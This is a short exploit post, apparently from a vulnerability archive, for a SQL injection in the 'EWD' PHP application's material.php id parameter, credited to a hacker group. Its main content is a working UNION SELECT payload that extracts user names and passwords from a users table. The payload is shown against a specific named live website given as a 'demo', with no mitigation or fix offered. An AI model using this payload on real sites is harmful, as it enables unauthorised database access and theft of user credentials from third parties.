EWD SQL Injection

2012.01.22

Credit: skote_vahshat

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|* ______ ____ __ __ |
|* /\__ _\/\ _`\ /\ \/\ \ |
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |
|* \ \ \ \ \ _ <'\ \ _ \ |
|* \ \ \ \ \ \L\ \\ \ \ \ \ |
|* \ \_\ \ \____/ \ \_\ \_\ |
|* \/_/ \/___/ \/_/\/_/ |
|* |
|* |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title] :[EWD sql injection vulnerability] /*
\* [Author] :[skote_vahshat] /*
\* [Home] :[Http://turk-bh.ir] /*
\* [Email] :[skote.vahshat@Gmail.Com] /*
=======================================================================
/*Powered-by: php
/* [+]Exploit :
/* http://www.target.com/material.php?id=[SQLi]
/* [+]Demo:
/* http://www.thecompletepianist.com/material.php?id=[SQLi]
/*
/*
/*[+] table => users
/*
/*[+] column => name + password
/*
/*
/*[+] injection
/* http://www.thecompletepianist.com/material.php?id=-18+union+select+1,2,name,4,password,6,7,8+from+users
/*
/*
=======================================================================
|_***_| bl4ck.viper ,Turk_server , hellboy , netqurd , and all hacker|
|_***_| spical thanks : turk-bh.ir members all turkiS hackers |
=======================================================================

References:

http://turk-bh.ir

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

EWD SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.